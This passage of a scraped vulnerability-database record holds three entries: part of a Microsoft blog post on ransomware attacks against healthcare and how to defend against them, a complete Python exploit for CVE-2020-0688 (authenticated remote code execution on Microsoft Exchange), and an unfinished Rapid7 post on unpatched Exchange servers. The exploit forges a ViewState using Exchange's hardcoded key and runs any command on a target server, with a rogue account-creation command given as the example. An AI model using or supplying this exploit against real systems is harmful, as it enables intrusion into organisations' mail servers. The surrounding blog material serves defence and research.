They then remained relatively dormant within environments until they identified an opportune time to deploy ransomware.\n\nTo gain access to target networks, the recent ransomware campaigns exploited internet-facing systems with the following weaknesses:\n\n * Remote Desktop Protocol (RDP) or Virtual Desktop endpoints without multi-factor authentication (MFA)\n * Older platforms that have reached end of support and are no longer getting security updates, such as Windows Server 2003 and Windows Server 2008, exacerbated by the use of weak passwords\n * Misconfigured web servers, including IIS, electronic health record (EHR) software, backup servers, or systems management servers\n * Citrix Application Delivery Controller (ADC) systems affected by [CVE-2019-19781](<https://support.citrix.com/article/CTX267027>)\n * Pulse Secure VPN systems affected by [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)\n\nApplying security patches for internet-facing systems is critical in preventing these attacks. It\u2019s also important to note that, although Microsoft security researchers have not observed the recent attacks exploiting the following vulnerabilities, historical signals indicate that these campaigns may eventually exploit them to gain access, so they are worth reviewing: [CVE-2019-0604](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0604>), [CVE-2020-0688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>), [CVE-2020-10189](<https://nvd.nist.gov/vuln/detail/CVE-2020-10189>).\n\nLike many breaches, attackers employed credential theft, lateral movement capabilities using common tools, including Mimikatz and Cobalt Strike, network reconnaissance, and data exfiltration. In these specific campaigns, the operators gained access to highly privileged administrator credentials and were ready to take potentially more destructive action if disturbed. 
On networks where attackers deployed ransomware, they deliberately maintained their presence on some endpoints, intending to reinitiate malicious activity after ransom is paid or systems are rebuilt. In addition, while only a few of these groups gained notoriety for selling data, almost all of them were observed viewing and exfiltrating data during these attacks, even if they have not advertised or sold yet.\n\nAs with all human-operated ransomware campaigns, these recent attacks spread throughout an environment affecting email identities, endpoints, inboxes, applications, and more. Because it can be challenging even for experts to ensure complete removal of attackers from a fully compromised network, it\u2019s critical that vulnerable internet-facing systems are proactively patched and mitigations put in place to reduce the risk from these kinds of attacks.\n\n## A motley crew of ransomware payloads\n\nWhile individual campaigns and ransomware families exhibited distinct attributes as described in the sections below, these human-operated ransomware campaigns tended to be variations on a common attack pattern. They unfolded in similar ways and employed generally the same attack techniques. Ultimately, the specific ransomware payload at the end of each attack chain was almost solely a stylistic choice made by the attackers.\n\n\n\n### RobbinHood ransomware\n\nRobbinHood ransomware operators gained some attention for [exploiting vulnerable drivers](<https://www.microsoft.com/security/blog/2020/03/17/secured-core-pcs-a-brief-showcase-of-chip-to-cloud-security-against-kernel-attacks/>) late in their attack chain to turn off security software. However, like many other human-operated ransomware campaigns, they typically start with an RDP brute-force attack against an exposed asset. They eventually obtain privileged credentials, mostly local administrator accounts with shared or common passwords, and service accounts with domain admin privileges. 
RobbinHood operators, like Ryuk and other well-publicized ransomware groups, leave behind new local and Active Directory user accounts, so they can regain access after their malware and tools have been removed.\n\n### Vatet loader\n\nAttackers often shift infrastructure, techniques, and tools to avoid notoriety that might attract law enforcement or security researchers. They often retain them while waiting for security organizations to start considering associated artifacts inactive, so they face less scrutiny. Vatet, a custom loader for the Cobalt Strike framework that has been seen in ransomware campaigns as early as November 2018, is one of the tools that has resurfaced in the recent campaigns.\n\nThe group behind this tool appears to be particularly intent on targeting hospitals, as well as aid organizations, insulin providers, medical device manufacturers, and other critical verticals. They are one of the most prolific ransomware operators during this time and have caused dozens of cases.\n\nUsing Vatet and Cobalt Strike, the group has delivered various ransomware payloads. More recently, they have been deploying in-memory ransomware that utilizes Alternate Data Streams (ADS) and displays simplistic ransom notes copied from older ransomware families. To access target networks, they exploit [CVE-2019-19781](<https://support.citrix.com/article/CTX267027>), brute force RDP endpoints, and send email containing .lnk files that launch malicious PowerShell commands. Once inside a network, they steal credentials, including those stored in the Credential Manager vault, and move laterally until they gain domain admin privileges. The group has been observed exfiltrating data prior to deploying ransomware.\n\n### NetWalker ransomware\n\nNetWalker campaign operators gained notoriety for targeting hospitals and healthcare providers with emails claiming to provide information about COVID-19. 
These emails also delivered NetWalker ransomware directly as a .vbs attachment, a technique that has gained media attention. However, the campaign operators also compromised networks using misconfigured IIS-based applications to launch Mimikatz and steal credentials, which they then used to launch PsExec and eventually deploy the same NetWalker ransomware.\n\n### PonyFinal ransomware\n\nThis Java-based ransomware had been considered a novelty, but the campaigns deploying PonyFinal weren\u2019t unusual. Campaign operators compromised internet-facing web systems and obtained privileged credentials. To establish persistence, they used PowerShell commands to launch the system tool mshta.exe and set up a reverse shell based on a common PowerShell attack framework. They also used legitimate tools, such as Splashtop, to maintain remote desktop connections.\n\n### Maze ransomware\n\nOne of the first ransomware campaigns to make headlines for selling stolen data, Maze continues to target technology providers and public services. Maze has a history of going after managed service providers (MSPs) to gain access to the data and networks of MSP customers.\n\nMaze has been delivered via email, but campaign operators have also deployed Maze to networks after gaining access using common vectors, such as RDP brute force. Once inside a network, they perform credential theft, move laterally to access resources and exfiltrate data, and then deploy ransomware.\n\nIn a recent campaign, Microsoft security researchers tracked Maze operators establishing access through an internet-facing system by performing RDP brute force against the local administrator account. 
Using the brute-forced password, campaign operators were able to move laterally because built-in administrator accounts on other endpoints used the same passwords.\n\nAfter gaining control over a domain admin account through credential theft, campaign operators used Cobalt Strike, PsExec, and a plethora of other tools to deploy various payloads and access data. They established fileless persistence using scheduled tasks and services that launched PowerShell-based remote shells. They also turned on Windows Remote Management for persistent control using stolen domain admin privileges. To weaken security controls in preparation for ransomware deployment, they manipulated various settings through Group Policy.\n\n### REvil ransomware\n\nPossibly the first ransomware group to take advantage of the network device vulnerabilities in Pulse VPN to steal credentials to access networks, REvil (also called Sodinokibi) gained notoriety for accessing MSPs and accessing the networks and documents of customers \u2013 and selling access to both. They kept up this activity during the COVID-19 crisis, targeting MSPs and other targets like local governments. 
REvil attacks are differentiated in their uptake of new vulnerabilities, but their techniques overlap with many other groups, relying on credential theft tools like Mimikatz once in the network and performing lateral movement and reconnaissance with tools like PsExec.\n\n### Other ransomware families\n\nOther ransomware families used in human-operated campaigns during this period include:\n\n * Paradise, which used to be distributed directly via email but is now used in human-operated ransomware attacks\n * RagnarLocker, which is deployed by a group that heavily uses RDP and Cobalt Strike with stolen credentials\n * MedusaLocker, which is possibly deployed via existing Trickbot infections\n * LockBit, which is distributed by operators that use the publicly available penetration testing tool CrackMapExec to move laterally\n\n## Immediate response actions for active attacks\n\nWe highly recommend that organizations immediately check if they have any alerts related to these ransomware attacks and prioritize investigation and remediation. 
Malicious behaviors relevant to these attacks that defenders should pay attention to include:\n\n * Malicious PowerShell, Cobalt Strike, and other penetration-testing tools that can allow attacks to blend in as benign red team activities\n * Credential theft activities, such as suspicious access to Local Security Authority Subsystem Service (LSASS) or suspicious registry modifications, which can indicate new attacker payloads and tools for stealing credentials\n * Any tampering with a security event log, forensic artifact such as the USNJournal, or a security agent, which attackers do to evade detections and to erase chances of recovering data\n\nCustomers using [Microsoft Defender Advanced Threat Protection (ATP)](<https://www.microsoft.com/en-us/microsoft-365/windows/microsoft-defender-atp>) can consult a companion [threat analytics](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/threat-analytics>) report for more details on relevant alerts, as well as advanced hunting queries. Customers subscribed to the [Microsoft Threat Experts](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/microsoft-threat-experts>) service can also refer to the [targeted attack notification](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/microsoft-threat-experts#targeted-attack-notification>), which has detailed timelines of attacks, recommended mitigation steps for disrupting attacks, and remediation advice.\n\nIf your network is affected, perform the following scoping and investigation activities immediately to understand the impact of this breach. 
Using indicators of compromise (IOCs) alone to determine impact from these threats is not a durable solution, as most of these ransomware campaigns employ \u201cone-time use\u201d infrastructure for campaigns, and often change their tools and systems once they determine the detection capabilities of their targets. Detections and mitigations should concentrate on holistic behavior-based hunting where possible, and on hardening infrastructure weaknesses favored by these attackers as soon as possible.\n\n### Investigate affected endpoints and credentials\n\nInvestigate endpoints affected by these attacks and identify all the credentials present on those endpoints. Assume that these credentials were available to attackers and that all associated accounts are compromised. Note that attackers can not only dump credentials for accounts that have logged on to interactive or RDP sessions, but can also dump cached credentials and passwords for service accounts and scheduled tasks that are stored in the LSA Secrets section of the registry.\n\n * For endpoints onboarded to [Microsoft Defender ATP](<https://www.microsoft.com/en-us/microsoft-365/windows/microsoft-defender-atp>), use advanced hunting to identify accounts that have logged on to affected endpoints. The threat analytics report contains a hunting query for this purpose.\n * Otherwise, check the Windows Event Log for post-compromise logons\u2014those that occur after or during the earliest suspected breach activity\u2014with event ID 4624 and logon type 2 or 10. For any other timeframe, check for logon type 4 or 5.\n\n### Isolate compromised endpoints\n\nIsolate endpoints that have command-and-control beacons or have been lateral movement targets. Locate these endpoints using advanced hunting queries or other methods of directly searching for related IOCs. 
[Isolate machines](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/respond-machine-alerts#isolate-machines-from-the-network>) using Microsoft Defender ATP, or use other data sources, such as NetFlow, and search through your SIEM or other centralized event management solutions. Look for lateral movement from known affected endpoints.\n\n### Address internet-facing weaknesses\n\nIdentify perimeter systems that attackers might have utilized to access your network. You can use a public scanning interface, such as [_shodan.io_](<https://www.shodan.io/>), to augment your own data. Systems that should be considered of interest to attackers include:\n\n * RDP or Virtual Desktop endpoints without MFA\n * Citrix ADC systems affected by CVE-2019-19781\n * Pulse Secure VPN systems affected by CVE-2019-11510\n * Microsoft SharePoint servers affected by CVE-2019-0604\n * Microsoft Exchange servers affected by CVE-2020-0688\n * Zoho ManageEngine systems affected by CVE-2020-10189\n\nTo further reduce organizational exposure, Microsoft Defender ATP customers can use the [Threat and Vulnerability Management (TVM)](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/next-gen-threat-and-vuln-mgt>) capability to discover, prioritize, and remediate vulnerabilities and misconfigurations. TVM allows security administrators and IT administrators to collaborate seamlessly to remediate issues.\n\n### Inspect and rebuild devices with related malware infections\n\nMany ransomware operators enter target networks through existing infections of malware like Emotet and Trickbot. These malware families, traditionally considered to be banking trojans, have been used to deliver all kinds of payloads, including persistent implants. Investigate and remediate any known infections and consider them possible vectors for sophisticated human adversaries. 
Ensure that you check for exposed credentials, additional payloads, and lateral movement prior to rebuilding affected endpoints or resetting passwords.\n\n## Building security hygiene to defend networks against human-operated ransomware\n\nAs ransomware operators continue to compromise new targets, defenders should proactively assess risk using all available tools. You should continue to enforce proven preventive solutions\u2014credential hygiene, minimal privileges, and host firewalls\u2014to stymie these attacks, which have been consistently observed taking advantage of security hygiene issues and over-privileged credentials.\n\nApply these measures to make your network more resilient against new breaches, reactivation of dormant implants, or lateral movement:\n\n * Randomize local administrator passwords using a tool such as LAPS.\n * Apply [Account Lockout Policy](<https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/account-lockout-policy>).\n * Ensure good perimeter security by patching exposed systems. Apply mitigating factors, such as MFA or vendor-supplied mitigation guidance, for vulnerabilities.\n * Utilize [host firewalls to limit lateral movement](<https://support.microsoft.com/en-us/help/3185535/preventing-smb-traffic-from-lateral-connections>). Preventing endpoints from communicating on TCP port 445 for SMB will have limited negative impact on most networks, but can significantly disrupt adversary activities.\n * Turn on cloud-delivered protection for Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a huge majority of new and unknown variants.\n * Follow standard guidance in the [security baselines](<https://techcommunity.microsoft.com/t5/microsoft-security-baselines/bg-p/Microsoft-Security-Baselines>) for Office and Office 365 and the Windows security baselines. 
Use [Microsoft Secure Score](<https://docs.microsoft.com/en-us/microsoft-365/security/mtp/microsoft-secure-score-preview>) to assess and measure security posture and get recommended improvement actions, guidance, and control.\n * Turn on [tamper protection](<https://techcommunity.microsoft.com/t5/Microsoft-Defender-ATP/Tamper-protection-now-generally-available-for-Microsoft-Defender/ba-p/911482>) features to prevent attackers from stopping security services.\n * Turn on [attack surface reduction rules](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction>), including rules that can block ransomware activity: \n * Use advanced protection against ransomware\n * Block process creations originating from PsExec and WMI commands\n * Block credential stealing from the Windows local security authority subsystem (lsass.exe)\n\nFor additional guidance on improving defenses against human-operated ransomware and building better security posture against cyberattacks in general, read [Human-operated ransomware attacks: A preventable disaster](<https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/>).\n\n## Microsoft Threat Protection: Coordinated defense against complex and wide-reaching human-operated ransomware\n\nWhat we\u2019ve learned from the increase in ransomware deployments in April is that attackers pay no attention to the real-world consequences of disruption in services\u2014in this time of global crisis\u2014that their attacks cause.\n\nHuman-operated ransomware attacks represent a different level of threat because adversaries are adept at systems administration and security misconfigurations and can therefore adapt to any path of least resistance they find in a compromised network. If they run into a wall, they try to break through. 
And if they can\u2019t break through a wall, they\u2019ve shown that they can skillfully find other ways to move forward with their attack. As a result, human-operated ransomware attacks are complex and wide-reaching. No two attacks are exactly the same.\n\n[Microsoft Threat Protection (MTP)](<https://www.microsoft.com/en-us/security/technology/threat-protection>) provides coordinated defenses that uncover the complete attack chain and help block sophisticated attacks like human-operated ransomware. MTP combines the capabilities of multiple Microsoft 365 security services to orchestrate protection, prevention, detection, and response across endpoints, email, identities, and apps.\n\nThrough built-in intelligence, automation, and integration, MTP can block attacks, eliminate their persistence, and auto-heal affected assets. It correlates signals and consolidates alerts to help defenders prioritize incidents for investigation and response. MTP also provides a unique cross-domain hunting capability that can further help defenders identify attack sprawl and get org-specific insights for hardening defenses.\n\nMicrosoft Threat Protection is also part of a [chip-to-cloud security approach](<https://www.microsoft.com/security/blog/2020/03/17/secured-core-pcs-a-brief-showcase-of-chip-to-cloud-security-against-kernel-attacks/>) that combines threat defense on the silicon, operating system, and cloud. Hardware-backed security features on Windows 10 like address space layout randomization (ASLR), Control Flow Guard (CFG), and others harden the platform against many advanced threats, including ones that take advantage of vulnerable kernel drivers. These platform security features seamlessly integrate with Microsoft Defender ATP, providing end-to-end security that starts from a strong hardware root of trust. 
On [Secured-core PCs](<https://www.microsoft.com/en-us/windowsforbusiness/windows10-secured-core-computers>) these mitigations are enabled by default.\n\nWe continue to work with our customers, partners, and the research community to track human-operated ransomware and other sophisticated attacks. For dire cases customers can use available services like the [Microsoft Detection and Response (DART) team](<https://www.microsoft.com/security/blog/microsoft-detection-and-response-team-dart-blog-series/>) to help investigate and remediate.\n\n \n\n_Microsoft Threat Protection Intelligence Team_\n\n \n\n## Appendix: MITRE ATT&CK techniques observed\n\nHuman-operated ransomware campaigns employ a broad range of techniques made possible by attacker control over privileged domain accounts. The techniques listed here are techniques commonly used during attacks against healthcare and critical services in April 2020.\n\nCredential access\n\n * [T1003 Credential Dumping](<https://attack.mitre.org/techniques/T1003/>) | Use of LaZagne, Mimikatz, LsaSecretsView, and other credential dumping tools and exploitation of [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) on vulnerable endpoints\n\nPersistence\n\n * [T1084 Windows Management Instrumentation Event Subscription](<https://attack.mitre.org/techniques/T1084/>) | WMI event subscription\n * [T1136 Create Account](<https://attack.mitre.org/techniques/T1136/>) | Creation of new accounts for RDP\n\nCommand and control\n\n * [T1043 Commonly Used Port](<https://attack.mitre.org/techniques/T1043/>) | Use of port 443\n\nDiscovery\n\n * [T1033 System Owner/User Discovery](<https://attack.mitre.org/techniques/T1033/>) | Various commands\n * [T1087 Account Discovery](<https://attack.mitre.org/techniques/T1087/>) | LDAP and AD queries and other commands\n * [T1018 Remote System Discovery](<https://attack.mitre.org/techniques/T1018/>) | Pings, qwinsta, and other tools and commands\n * [T1482 Domain Trust 
Discovery](<https://attack.mitre.org/techniques/T1482/>) | Domain trust enumeration using Nltest\n\nExecution\n\n * [T1035 Service Execution](<https://attack.mitre.org/techniques/T1035/>) | Service registered to run CMD (as ComSpec) and PowerShell commands\n\nLateral movement\n\n * [T1076 Remote Desktop Protocol](<https://attack.mitre.org/techniques/T1076/>) | Use of RDP to reach other machines in the network\n * [T1105 Remote File Copy](<https://attack.mitre.org/techniques/T1105/>) | Lateral movement using WMI and PsExec\n\nDefense evasion\n\n * [T1070 Indicator Removal on Host](<https://attack.mitre.org/techniques/T1070/>) | Clearing of event logs using wevtutil, removal of USNJournal using fsutil, and deletion of slack space on drive using cipher.exe\n * [T1089 Disabling Security Tools](<https://attack.mitre.org/techniques/T1089/>) | Stopping or tampering with antivirus and other security using ProcessHacker and exploitation of vulnerable software drivers\n\nImpact\n\n * [T1489 Service Stop](<https://attack.mitre.org/techniques/T1489/>) | Stopping of services prior to encryption\n * [T1486 Data Encrypted for Impact](<https://attack.mitre.org/techniques/T1486/>) | Ransomware encryption\n\nThe post [Ransomware groups continue to target healthcare, critical services; here\u2019s how to reduce risk](<https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/>) appeared first on [Microsoft Security.", "modified": "2020-04-28T16:00:49", "published": "2020-04-28T16:00:49", "id": "MSSECURE:E3C8B97294453D962741782EC959E79C", "href": "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/", "type": "mssecure", "title": "Ransomware groups continue to target healthcare, critical services; here\u2019s how to reduce risk", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitpack": 
[{"lastseen": "2020-04-01T20:40:18", "description": "\nMicrosoft Exchange 2019 15.2.221.12 - Authenticated Remote Code Execution", "edition": 1, "published": "2020-03-02T00:00:00", "title": "Microsoft Exchange 2019 15.2.221.12 - Authenticated Remote Code Execution", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-0688"], "modified": "2020-03-02T00:00:00", "id": "EXPLOITPACK:71F27F0B85E2B8F7A6B9272A3136DA05", "href": "", "sourceData": "# Exploit Title: Microsoft Exchange 2019 15.2.221.12 - Authenticated Remote Code Execution\n# Date: 2020-02-28\n# Exploit Author: Photubias\n# Vendor Advisory: [1] https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688\n# [2] https://www.thezdi.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys\n# Vendor Homepage: https://www.microsoft.com\n# Version: MS Exchange Server 2010 SP3 up to 2019 CU4\n# Tested on: MS Exchange 2019 v15.2.221.12 running on Windows Server 2019\n# CVE: CVE-2020-0688\n\n#! /usr/bin/env python\n# -*- coding: utf-8 -*- \n''' \n\n \n\tCopyright 2020 Photubias(c)\n\n This program is free software: you can redistribute it and/or modify\n it under the terms of the GNU General Public License as published by\n the Free Software Foundation, either version 3 of the License, or\n (at your option) any later version.\n\n This program is distributed in the hope that it will be useful,\n but WITHOUT ANY WARRANTY; without even the implied warranty of\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n GNU General Public License for more details.\n\n You should have received a copy of the GNU General Public License\n along with this program. 
If not, see <http://www.gnu.org/licenses/>.\n \n File name CVE-2020-0688-Photubias.py\n written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be\n\n This is a native implementation without requirements, written in Python 2.\n Works equally well on Windows as Linux (as MacOS, probably ;-)\n Reverse Engineered Serialization code from https://github.com/pwntester/ysoserial.net\n\n Example Output:\n CVE-2020-0688-Photubias.py -t https://10.11.12.13 -u sean -c \"net user pwned pwned /add\"\n [+] Login worked\n [+] Got ASP.NET Session ID: 83af2893-6e1c-4cee-88f8-b706ebc77570\n [+] Detected OWA version number 15.2.221.12\n [+] Vulnerable View State \"B97B4E27\" detected, this host is vulnerable!\n [+] All looks OK, ready to send exploit (net user pwned pwned /add)? [Y/n]:\n [+] Got Payload: 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\n Sending now ...\n'''\nimport urllib2, urllib, base64, binascii, hashlib, hmac, struct, argparse, sys, cookielib, ssl, getpass\n\n## STATIC STRINGS\n# This string acts as a template for the serialization (contains \"###payload###\" to be replaced and TWO size locations)\nstrSerTemplate = base64.b64decode('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')\n# This is a key installed in the Exchange Server, it is changeable, but often not (part of the vulnerability)\nstrSerKey = binascii.unhexlify('CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF')\n\ndef convertInt(iInput, length): \n return struct.pack(\"<I\" , int(iInput)).encode('hex')[:length]\n\ndef getYsoserialPayload(sCommand, sSessionId):\n ## PART1 of the payload to hash\n strPart1 = strSerTemplate.replace('###payload###', sCommand)\n ## Fix the length fields\n #print(binascii.hexlify(strPart1[3]+strPart1[4])) ## 'da06' > '06da' (0x06b8 + len(sCommand))\n #print(binascii.hexlify(strPart1[224]+strPart1[225])) ## 'fc04' > '04fc' (0x04da + len(sCommand))\n strLength1 = convertInt(0x06b8 + len(sCommand),4)\n strLength2 = convertInt(0x04da + len(sCommand),4)\n strPart1 = 
strPart1[:3] + binascii.unhexlify(strLength1) + strPart1[5:]\n strPart1 = strPart1[:224] + binascii.unhexlify(strLength2) + strPart1[226:]\n \n ## PART2 of the payload to hash\n strPart2 = '274e7bb9'\n for v in sSessionId: strPart2 += binascii.hexlify(v)+'00'\n strPart2 = binascii.unhexlify(strPart2)\n \n strMac = hmac.new(strSerKey, strPart1 + strPart2, hashlib.sha1).hexdigest()\n strResult = base64.b64encode(strPart1 + binascii.unhexlify(strMac))\n return strResult\n\ndef verifyLogin(sTarget, sUsername, sPassword, oOpener, oCookjar):\n if not sTarget[-1:] == '/': sTarget += '/'\n ## Verify Login\n lPostData = {'destination' : sTarget, 'flags' : '4', 'forcedownlevel' : '0', 'username' : sUsername, 'password' : sPassword, 'passwordText' : '', 'isUtf8' : '1'}\n try: sResult = oOpener.open(urllib2.Request(sTarget + 'owa/auth.owa', data=urllib.urlencode(lPostData), headers={'User-Agent':'Python'})).read()\n except: print('[!] Error, ' + sTarget + ' not reachable')\n bLoggedIn = False\n for cookie in oCookjar:\n if cookie.name == 'cadata': bLoggedIn = True\n if not bLoggedIn:\n print('[-] Login Wrong, too bad')\n exit(1)\n print('[+] Login worked')\n\n ## Verify Session ID\n sSessionId = ''\n sResult = oOpener.open(urllib2.Request(sTarget+'ecp/default.aspx', headers={'User-Agent':'Python'})).read()\n for cookie in oCookjar:\n if 'SessionId' in cookie.name: sSessionId = cookie.value\n print('[+] Got ASP.NET Session ID: ' + sSessionId)\n\n ## Verify OWA Version\n sVersion = ''\n try: sVersion = sResult.split('stylesheet')[0].split('href=\"')[1].split('/')[2]\n except: sVersion = 'favicon'\n if 'favicon' in sVersion:\n print('[*] Problem, this user has never logged in before (wizard detected)')\n print(' Please log in manually first at ' + sTarget + 'ecp/default.aspx')\n exit(1)\n print('[+] Detected OWA version number '+sVersion)\n\n ## Verify ViewStateValue\n sViewState = ''\n try: sViewState = 
sResult.split('__VIEWSTATEGENERATOR')[2].split('value=\"')[1].split('\"')[0]\n except: pass\n if sViewState == 'B97B4E27':\n print('[+] Vulnerable View State \"B97B4E27\" detected, this host is vulnerable!')\n else:\n print('[-] Error, viewstate wrong or not correctly parsed: '+sViewState)\n ans = raw_input('[?] Still want to try the exploit? [y/N]: ')\n if ans == '' or ans.lower() == 'n': exit(1)\n return sSessionId, sTarget, sViewState\n \ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('-t', '--target', help='Target IP or hostname (e.g. https://owa.contoso.com)', default='')\n parser.add_argument('-u', '--username', help='Username (e.g. joe or joe@contoso.com)', default='')\n parser.add_argument('-p', '--password', help='Password (leave empty to ask for it)', default='')\n parser.add_argument('-c', '--command', help='Command to put behind \"cmd /c \" (e.g. net user pwned pwned /add)', default='')\n args = parser.parse_args()\n if args.target == '' or args.username == '' or args.command == '':\n print('[!] Example usage: ')\n print(' ' + sys.argv[0] + ' -t https://owa.contoso.com -u joe -c \"net user pwned pwned /add\"')\n else:\n if args.password == '': sPassword = getpass.getpass('[*] Please enter the password: ')\n else: sPassword = args.password\n ctx = ssl.create_default_context()\n ctx.check_hostname = False\n ctx.verify_mode = ssl.CERT_NONE\n oCookjar = cookielib.CookieJar()\n #oProxy = urllib2.ProxyHandler({'http': '127.0.0.1:8080', 'https': '127.0.0.1:8080'})\n #oOpener = urllib2.build_opener(urllib2.HTTPSHandler(context=ctx),urllib2.HTTPCookieProcessor(oCookjar),oProxy)\n oOpener = urllib2.build_opener(urllib2.HTTPSHandler(context=ctx),urllib2.HTTPCookieProcessor(oCookjar))\n sSessionId, sTarget, sViewState = verifyLogin(args.target, args.username, sPassword, oOpener, oCookjar)\n ans = raw_input('[+] All looks OK, ready to send exploit (' + args.command + ')? 
[Y/n]: ')\n if ans.lower() == 'n': exit(0)\n sPayLoad = getYsoserialPayload(args.command, sSessionId)\n print('[+] Got Payload: ' + sPayLoad)\n sURL = sTarget + 'ecp/default.aspx?__VIEWSTATEGENERATOR=' + sViewState + '&__VIEWSTATE=' + urllib.quote_plus(sPayLoad)\n print(' Sending now ...')\n try: oOpener.open(urllib2.Request(sURL, headers={'User-Agent':'Python'}))\n except urllib2.HTTPError, e:\n if e.code == '500': print('[+] This probably worked (Error Code 500 received)')\n\nif __name__ == \"__main__\":\n\tmain()", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "rapid7blog": [{"lastseen": "2020-09-29T16:39:11", "bulletinFamily": "info", "cvelist": ["CVE-2020-0688"], "description": "\n\nToday's topic is Exchange 2010, which reaches end of support (EoS) on Oct. 13, 2020, as well as a survey of other versions of Exchange and how well they are being kept up-to-date. During our work with [Project Sonar](<https://www.rapid7.com/research/project-sonar/>), we consistently see the use of old and EoS software on the internet. This is generally a cause for concern, because this typically means that vulnerabilities will not be fixed. It is also an indicator that the environment the software is running in has other security issues.\n\nThe key takeaways from this post are:\n\n * Organizations running Exchange 2010 and earlier should upgrade to supported technology as soon as possible.\n * Organizations running Exchange 2013 should begin planning to upgrade to newer technologies.\n * Statistically speaking, most organizations running any version of Exchange are missing updates for critical vulnerabilities.\n\nBefore I move on, I want to point out that our numbers here will be fairly accurate, but not perfect. This is due to a couple of factors: First, the method that we use to fingerprint Exchange OWA allows us to determine the Exchange version down to `<major version>.<minor version>.<build number>`, but we cannot see the revision. 
For example, for Exchange Server 2019 Cumulative Update (CU) 7, with the latest updates the build number is `15.2.721.2`, but we only see `15.2.721`. This means that we can tell that the server is running 2019 CU7, but we can't be sure whether this month's patches were installed. Second, and most frustrating, is that Microsoft's updates don't always adjust the version number shown by tooling. Even Microsoft's own Exchange Admin Center and `Get-ExchangeServer` command will report incorrect versions in many instances.\n\n## Exchange 2010: A decade of support ends\n\nJust under 11 years ago, Microsoft released Exchange 2010. On Tuesday, Oct. 13, 2020, Microsoft Exchange 2010 will reach [End of Support (EoS) status](<https://techcommunity.microsoft.com/t5/exchange-team-blog/microsoft-extending-end-of-support-for-exchange-server-2010-to/ba-p/753591>). Microsoft will not provide **any** updates, including security fixes, after this date. While the software will keep working after this date, a quick glance at the Exchange vulnerabilities announced in 2020 will quickly show the importance of security updates.\n\nIn March 2020, we used Project Sonar to measure the number of Exchange servers that might be vulnerable to [CVE-2020-0688](<https://blog.rapid7.com/2020/04/06/phishing-for-system-on-microsoft-exchange-cve-2020-0688/>). At that time, we found over 166,000 Exchange 2010 servers with internet-facing Outlook Web App (OWA) services. On Monday, Sept. 21, 2020, we looked again and found that while the numbers had decreased, there are still 139,771 OWA services.\n\n\n\nThat's a scary number of servers that will not receive security updates for any future vulnerabilities. Both scary and disappointing is the fact that 40,000 of these were already running unsupported versions of Exchange 2010. 
Nearly 54,000 of these have not been updated in six years!\n\n## Exchange 2007: Long past its expiration date\n\nSpeaking of software that hasn't seen updates in years, there are 16,577 Exchange 2007 servers with OWA on the public internet. This product has been out of support for over three years. Additionally, the newest version of Windows Server that Exchange 2007 runs on is Windows Server 2008 R2, which reached EoS in January 2020. In summary, this is a business-critical application running in an environment in which vulnerabilities will not be fixed.\n\n\n\n## Exchange 2013: The twilight years\n\nExchange 2013 transitioned to Extended Support in 2018 and will cease to be supported at all on April 11, 2023. Additionally, the newest version of Windows Server that Exchange 2013 runs on is Windows Server 2012 R2, [which reaches EoS on Oct. 10, 2023](<https://docs.microsoft.com/en-us/lifecycle/products/windows-server-2012-r2>). In short, the full Exchange 2013 environment, other than AD, will be **completely unsupported** in less than three years.\n\nOur Project Sonar metrics for OWA show that there are at least 102,593 Exchange 2013 servers on the public internet. Further, 67,567 (~66%) are not running a version of Exchange that Microsoft considers "Supported."\n\n\n\nGiven that Exchange is typically considered a business-critical application, and how complex an upgrade can be, we strongly recommend that organizations running Exchange 2013 start planning the upgrade process and timeline. 
The "Upgrading considerations" portion of the "Taking action" section at the end of the blog post calls out a few of the considerations that might make this process time-consuming or challenging.\n\n## Exchange 2016 and 2019: Newer, but still vulnerable\n\nWhile Exchange 2016 and 2019 will be supported for some time to come, organizations running them appear to be doing a poor job of keeping their environments up-to-date.\n\nOf the ~138,000 Exchange 2016 servers, 87% were missing the most recent updates.\n\n\n\nSimilarly, 77% of the ~25,000 Exchange 2019 servers we observed were missing updates. There are nearly 2,100 that, as far as we can tell, have _never_ had updates installed.\n\n\n\n## Taking action\n\nGiven the potential risks that a compromised Exchange environment presents, we have the following recommendations:\n\n * Organizations using Exchange 2010 or earlier should aggressively pursue upgrading their environment to supported technologies.\n * Organizations using Exchange 2013 should ensure they have a plan and timeline for upgrading to supported technologies by April 11, 2023. Remember that the most modern version of Windows Server that 2013 supports is also going EoS that year, so the process may introduce new server OSes into the environment as well. Please see the "Upgrading considerations" section below for some of the challenges that may need to be accounted for.\n * Organizations using Exchange 2016 or on-premises 2019 should ensure their Exchange environment is currently up-to-date and that there is a plan and process for keeping it updated.\n * Organizations using Exchange hosted by a non-Microsoft vendor should ensure the vendor has a plan and 